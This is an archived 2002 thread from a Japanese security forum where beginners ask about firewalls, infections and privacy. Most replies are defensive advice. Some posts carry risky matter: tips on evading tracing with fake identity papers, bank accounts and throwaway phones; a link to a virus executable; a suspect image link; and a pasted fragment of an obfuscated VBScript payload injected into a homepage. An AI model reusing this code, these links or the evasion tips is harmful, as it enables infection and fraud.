「いざというときには追跡不可能な偽の戸籍・口座を使ってプロバイダに加入する」が手っ取り早い。
そしてそれでどんな犯罪を犯すつもりなんだろう?
>>908
NTTの通信記録とか口座の振込み記録とかATMの防犯カメラとかどうすんだよ。
>>910
> NTTの通信記録とか
もちろんそこから偽の戸籍や口座は使う。

あのー、当たり前だけど、コトが済んだら
住んでる部屋や使った回線は引き払うんだよ?

もしかして家のパソコン使うとか間抜けなこと考えてない?
ま、「現実」世界できちんと匿名になれないような香具師は
ネット上でも匿名にはとうていなれやしないってとこかな。
セキュが完璧になるのはいつになるのだろうか (遠い目
914 :02/12/23 21:36
携帯のアドレスからこちらの身元がわかることってあるんでしょうか?
915cheshire-cat ◆PhCATJR.v6 :02/12/23 21:40
>>914
著しく板違いつうか流れ無視な話ですねん。

捨て携帯買え。
>>914
ある
917ゲイツ:02/12/23 23:11
質問があります
918名無しさん@お腹いっぱい。:02/12/23 23:12
http://iha.future.easyspace.com/virii/%68%64%66il%6c2.exe

コレを起動さしても何もおこらなかったのですが
なぜでしょうか?
バスターにはホワイターというウイルスって書いていましたが・・・。
>>918
マルチ
>>918
(・3・) エェー PC再起動してみれYO
921ゲイツ:02/12/23 23:18
Sygateを使用しているのですが
Traffic Logを見るとRule nameに
Allow non-first fragment
と表示されBlockされない場合があります
これはなんなでしょうか
低レベルで申し訳ないのですが、質問させてもらってよろしいでしょうか。
画像が一部、AD-SIZEとかADとか表示され、見ることができません。
セキュリティとかAgnitum Outpostの設定をいじくってたのですが・・・
で、表示を戻そうと思って設定をもとに戻したのですが見ることができません。
なぜでしょうか?ご教授のほどをよろしくお願いします。
923名無しさん@お腹いっぱい。:02/12/23 23:23
>>920
しましたが普通でした。
>919
答えてもらえないのでマルチしちゃいました。
>>922
Agnitum OutpostのPlug-insのAds
925ゲイツ:02/12/23 23:27
なお、ログの見方のページはここにありましたが、
http://koro.plala.jp/archi/security/sygate_set.php
自分のログを見るとファイアーウォール透過(許可)のマークだらけで
非常に不安です
926ぼるじょあ ◆yBEncckFOU :02/12/23 23:29
(・3・) エェー じゃぁZoneAlarm使えばいいYO! ぼるじょあでも使えるから君みたいな馬鹿でもOK!
(・3・) エェー
928ゲイツ:02/12/23 23:33
Zoneは重くて断念しました
929922:02/12/23 23:46
>>924
レスありがとうございます。
Agnitum OutpostのPlug-insのAdsはどちらもチェックを
はずしたのですが、それにもかかわらず見れません。
なぜでしょう??
(・3・) エェー 履歴削除してリロードしてみなYO!
931922:02/12/24 00:11
ダメですね。見れません。諦めようかな・・・
>>931
一度OutPostを再起動させないと設定の変更が反映されないことがあるよ。
やってみた?詳しくはこちらへどうぞ
http://pc.2ch.net/test/read.cgi/sec/1037724848/l50
933名無しさん@お腹いっぱい。:02/12/24 01:19
スアーと、メラーシャに感染したんですが
どうすればいいんでしょうか?
誰か助けてください。
おまえ、何に感染してるかわかってるならその先も自分で調べろよ。
>>933
sono pasokon wo mado kara sutero
atarashii pasokon wo kae!
936名無しさん@お腹いっぱい。:02/12/24 05:03
あのう昔気になったんですがパソコンが盗まれて警察がみつけたことがあった
らしいんですがそれはパソコン内の製造番号とかを外部(警察)が調べたという
ことですか?つまりそれらは外部からでもわかっちゃうものなんですか?
ちなみにそれらはどこにはいってるんですか?HD?メモリー?マザー?
長くてすみません  でも長い間気になっていたことなんでどうか教えてください。
(・3・) エェー ぼるじょあにもわかるように 
      文章としてきちんとした体裁をなした日本語で 聞きたいことを正確に表現してYO
      

(・3・) アルェー それってネットワークセキュリチーとなんのかんけいがあるかも教えてYO!
938名無しさん@お腹いっぱい。:02/12/24 13:30
dyndnsを使ってye.ath.cxにsmtpサバを立ててるんですがmxとかわかんなくてまともに立っているかどうかわかりません。気にするところがあれば教えてください。
939 :02/12/24 14:01
>>938
板違いっぽい
guest guest
不覚にもワラタ
943名無しさん@お腹いっぱい。:02/12/24 17:47
PC板のほうでも書き込んだんですが、インターネットのセキュリティーサイトに急に繋げなくなってしまいました。
ホットメールとかショッピングサイトが見れません。どこも触ってはいないと思うんですが、
ステータスバーのとこにLANのネットワークケーブルが繋がってない、と
なってます。これはセキュリティーサイトに行けないのと関係るんでしょうか?
どなたか直し方教えてください。
誰か〜日本語の通訳読んできて〜。
冬休みになると日本語の不自由な方が増えるスレはここですか?
>>943
何を言っているのかわからん
もう一度書き直せ
http://plaza21.mbn.or.jp/~mnakao/pc/trouble.html
947943:02/12/24 18:53
ご、ごめんなさい。
実はアメリカからです。PCも日本のはほとんど使った事無いうえに
オンチなので、上手く説明できませんが、LANはローカル・エリア・
ネットワークって書いてあります。画面の下にコンピュータが2台つながったような
絵が2つ出てて、そのうちの一つが×になってます。
分かってもらえるでしょうか?それがもしかしたらホットメールが見れないのと
関係があるのかと思ったんですが、どうでしょう?
説明不足なところがあれば、言って下さい。
とにかく必死なので、お願いします!
948名無しさん@お腹いっぱい。:02/12/24 19:00
>>947
・どのWebページが見えないのか?
・見れないページはセキュリティサイト、ホットメール、ショッピングサイトだけか?
・OSは何か?
・ネットワーク環境は何か?
・ブラウザは何か?
・トラブルに陥る直前にした操作は何か?
・「LANはローカル・エリ...」 ← わかりません

その他に、
・どこまでが推測でどこまでが事実なのか分からない
・アイコンや設定名がどこを指しているのかわからない
・セキュリティ板で質問するのが適切なのかどうか
950943:02/12/24 19:32
すみませーん、ネタでした (^ ^;
>>946
ass hole
952943:02/12/24 19:44
^^
>>951
まあ、クリスマスだし女と濃いセックスし終わって機嫌も良いから許してやるよ
>>953
すんまそん、女いなくて1人でオナーニするしかない人はどうすればええのん?
どうでもいいけど、今日はクリスマスイブっすよ・・・
955cheshire-cat ◆PhCATJR.v6 :02/12/24 22:01
>>954
漏れと一緒にナンパしに逝こっか(らぶ

とりあえず漏れの予定は、明日ヨドバシのバイト女とメシ食うだけですが。
>>955
ひでー振られかたしたんで、最近女性不信になっちまいました(w
なんつーか漏れは消耗品かえ? しばらく引きこもってようかな・・・

飯食いに行く人がうらやますぃ
957943:02/12/24 22:42
^^; あれ怒らせちゃいました??
958名無しさん@お腹いっぱい。:02/12/24 22:45
http://www2.strangeworld.org/uedakana/sahra6100.jpg
これを踏んでしまいました。
どのような処置をとったらよいでしょうか?
959cheshire-cat ◆PhCATJR.v6 :02/12/24 22:50
>>956
漏れも最近、クリスマスを一緒に過ごす予定の女と、ひでー別れ方したんで。

第一声は、「何だかこのシーズンって、人が多すぎて見ていて人酔いしない?」、ですた。
その後プリウスのキーボードがペコペコしすぎて壊れそうって話題で盛り上がって。。。。
ちなみに、あまりかわいくないけど愛嬌あっていい子ですた。
>>958
アンチウィルスのソフトあればスキャン、その後そのソフト作った会社の
サイトで調べるとか、あとはオンラインスキャンしてみるとか
ところでそのリンクは何だろう?

>>959
漏れなんか、「もういいや(w 」ですた・・・
ちなみにかわいいけど、愛嬌無いっつーか、そっけないっつーか
あれ、また泣きたくなってきた
961cheshire-cat ◆PhCATJR.v6 :02/12/24 23:18
>>958
strangewordは、踏むのは止めるべきキーワードっす。

>>960
漏れ的には、愛嬌ない女がたま〜に見せる笑顔に、グラっとくるんすけどね。
その頻度が少なすぎると、確かに泣きたくなる。。。。。。
>>961
そうです!それなんですよ!たまに見せる笑顔が、もうたまらんのです
その笑顔を見るためにどれだけ我慢すればいいのかわからんですよ・・・
無理に笑わせようとするとバッサリ切られるし
しばがやってたときは住人だったんだが。
964cheshire-cat ◆PhCATJR.v6 :02/12/24 23:35
>>962
漏れと同じ属性の人が居る。。。。。
そゆ恋愛って苦しいんですけどねん。
んでも、なぜ心をひかれるんでしょね。

>>963
こっちに居るんすか?絡んだ事無いんで遊びたい〜
つか、マジですか?

つかちょい電話落ち。
965名無しさん@お腹いっぱい。:02/12/24 23:44
    / ̄ ̄ ̄\
   /   ∧ ∧ \
  |     ・ ・   |  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |     )●(  | < 氏ねよおめーら
  \     ー   ノ   \_________
    \____/
>>964
きっとピーンと張り詰めたと言うか、気が抜けない緊張状態が続くんで
後には引けない、ってな感じになるんじゃないですかね?
漏れは周りに、ただ単に意地張ってるだけって言われますた・・・
967943:02/12/25 00:06
 あれ、怒り心頭で雑談っすか?^^;
>>943
環境も何も書かないで答えられるか。
ローカルエリアのアイコンを右クリック→接続。
969943:02/12/25 03:40
( ´,_ゝ`)プッ
970名無しさん@お腹いっぱい。:02/12/25 03:46
恥ずかしながらお尋ねいたします。
ハッカーに取り付かれました。yahooの常時接続です。
生理日の記録まで見られていて困っています。
変質者でしょうか。今のところ実害はないようですが
盗聴もされています。お手洗いの音まで聞いているようですので
充分実害があるともいえましょうか。
メールも全部読んでいます。なぜでしょう。
ドイツ人です。でも偽名をかたりメールがきます。
多重人格でしょうか。のぞき魔で放尿好きで偏執狂だと思うのですが
対処の仕方がわかりません。
ネタじゃないです。プロのストーカーでしょうか。

>>970
がんばって書いたんだろうが、つまらんです。
3点
972名無しさん@お腹いっぱい。:02/12/25 04:05
>971さん
ほんとです。作り話ではありません。
誰も信じてくれないでしょうが、困っているのです。
>>971
ネタにマジレス、
そこまで実害が出てるなら、警察逝け
974名無しさん@お腹いっぱい。:02/12/25 05:21
>973さん
どうもありがと。ネタじゃないです。
975名無しさん@お腹いっぱい。:02/12/25 06:44
    巛巛巛巛巛巛巛彡彡
    |:::::::         |
    |::::::::   U \` ´/|     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |:::::  u -・=-  -・=-  <   す、すべて計算通りゆーてるやろ?ば、馬鹿か?
    | (6.  U  ⌒ ) ・・)'⌒i    \________ 
    ィ|       ┏━━━┓|     
   /| !.     ┃ノ^^^^.i ┃|
__/  \\   ┃ヽニニノ┃ノ\
 |.|    ヽ、ヽ、. ┗━━┛/   \ 
 | |      `ヾ、     /     !!ヽ
 ヽヽ、r‐-‐-‐/⌒ヽー- /     //  `、
ヽ、 ヽ|_,|_,|_,h( ̄.ノヽ / ビシッ   //   ノ
ー-ヽノ| `~`".`´ ´"⌒⌒)    //    (
ノ^ //人  入_ノ´~ ̄    ノ/     ヽ
976初心者:02/12/25 09:57
こんにちは。いきなりなのですが、私はHPを運営しています。
それで、昨日うちのHPに来てくれた方がウイルスに感染してしまったと報告が
ありました。HPに行ってみたのですが下のバーに「実行しましたがエラーが発生
しました」と出ます。
自分は何の事だかよくわからず、とりあえずトレンドマイクロの
オンラインウイルススキャンを行いました。するとメッセージで「Trojan Syste
m Cleanerが検出され、駆除されました。」と出ました。
これは一体何なんでしょう?駆除されたのでこれでHPに来た人には感染しなく
なるのでしょうか?解決策等教えていただきたいのですが・・・。
今まで1年以上やっていてこういう事は初めてなのでちょっと混乱しています。
よろしくお願いします。
977初心者976:02/12/25 10:05
すいません。上のの続きなのですが、今自分のHPのソースを見たところ見なれない
ソースがありました。わたしはHPビルダーで作っています。
ソースをこぴぺしようと思ったのですが異常に長いのでちょっと無理そうです。
始めのほうだけ貼ってみました。
<script language=vbscript>
ExeString = "=fiBkSa^oa%AqieMbtm%S^lMbtm%Aa`kbaLbdj%:mle^L^c^`p%?PK%P
pOa^ih%PfjIZqd%Lr^>%CegZiu=bpgPq[HFXlq]km%%HFL^q@bf%%HF<kb]m^Je
ebbq!DCIed^Fp!DC@n^ZqaFZfh!DCMnhi^cZmb$Ag]On[Cqg\qehg
GC:ml^gaPh!Cee^M]ma)PribOmk&Hk>kokkOalnjaGbtmO^mN^ZaP^fm6COH
'Ll^gQaqmCee^%BbebLZme(*MfmOmk9Kb]]Mbii'OaZ]>heE_Fjlmo$MfmOmk)
DC\omZop!%5;)LnEbj!MjlLmo%5-MeagN^ZaP^fm*
>>976 アンチウィルスソフトを常駐させておくこと。
HPのソースから該当部分を削除してもう一度アップロードしなおす。
PCが感染 → HPのソースに感染 → アップロード → HP見た人が感染
979初心者976:02/12/25 10:27
>>978
素早いアドバイスありがとうございます。早速やってみます!
あともう一つ質問なのですが、感染してしまった人はウイルススキャン
で削除すればどうにかなるのでしょうか?
>>976-977 REDLOFのような気がするが・・・
>>979 レジストリ直す必要あり。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_LAMER.A.SVR
あとWindowsUpdateしてIEを最新のものにすること。
983初心者976:02/12/25 11:09
>980
他の方でHPに来てくれている方から”REDLOFではないでしょうか”と
メールをいただきました。REDLOFの場合の対処も同じですか?

>981
ありがとうございます。今は名前が違うのですね。
勝手にいじられたということなのでしょうか?恐ろしいですね。

>982
やってみます!ありがとうございます。
自分のPCからアプローダーに画像を上げる場合、”参照”で
”C:\Documents and Settings\○○○○\デスクトップ”などと指定しますが
この○○○○の部分は管理人に知られてしまうのですか?
確かめずに怪しいサイトにアップしてしまいました。
○○○○には本名を入れています。鬱です。
>>984
確実に渡る。
>>985
ありがとうございました。
画像ファイル名しか判らないと思った俺がバカでした。
987787=797:02/12/26 00:29
>>800
超遅くなりましたがレスありがとうございます。
同じところからまた新しいメールが来ました。
Fw:greetingsという題でメッセージのソースを覗くと

-----=_NextPart_000_00C2_01BD0D50.5DE622F0
Content-Type: application/x-msdownload;
name="xmas.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="xmas.exe"

などという文字が見えました。
まだ開いてないのですが、xmas.exeとdownloadという文字が気になります。
日本語が出来るのになぜ題が英語?
と思いつつもxmas.exeが見てみたいのです。
プレゼントもらったのに、腰抜けで見れませんでした
ではかっこうわるいので。
ウイルスバスターでは危ないですかね。
Outlook Expressは最新のにアップデートしました。
988名無しさん@お腹いっぱい。:02/12/26 11:06
質問です。パソコンの中にワームがいるようで
ノートンが反応しまくりです。Cドライブをフォーマット
して再インストールすればワームも消滅するのでしょうか?
>>988 ネタはよそでやれ。ここでは釣れないよ。
>>989
どこでやれと?教えれ
991名無しさん@お腹いっぱい。:02/12/26 11:24
>>987
怪しいexeファイルは開かないのが基本。
危険すぎる。マシンがどうなってもしらないよ。
>>988
普通のワームは単なるフォーマットだけで消滅しますが、中にはブート
セクタ感染に関係する特殊なタイプもあるようなので、その場合には、
フォーマットだけでは消滅しません。
たとえば、Fonoというブートセクタウィルスはワームを作り出すよう
です。こういう場合には起動ディスクのfdiskコマンドでHDDの領域
削除してOS再インストールせねばならないでしょう。
http://www.f-secure.co.jp/v-descs/v-descs2/fono.htm
>>992
激しく間違ってます。帰りなさい。



氏ね、基地外。
994名無しさん@お腹いっぱい。:02/12/26 12:55
↑993は粘着ヴァカです。
995名無しさん@お腹いっぱい。:02/12/26 13:00
誰か新スレ立ててください。
>>994
同類です。

>>995
まだダメです。
997薮パソユーザー ◇0fQkHdNop2 :02/12/26 13:22
>>993
アーチミチミ、何処がどうおかしいのか具体的に説明してくれないかな。
そうで無いと間違いを指摘したことにはならないのだが。
998名無しさん@お腹いっぱい。:02/12/26 13:23
↓次スレ!
初心者質問スレッドpart19
http://pc.2ch.net/test/read.cgi/sec/1040876540/l50
999にゃ ◆b8NYAO8alI :02/12/26 13:24
999?
1000にゃ ◆b8NYAO8alI :02/12/26 13:25
んじゃこれでおしまいヽ(´ー`)ノ
1000 ヽ(´ー`)ノヤホゥ
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。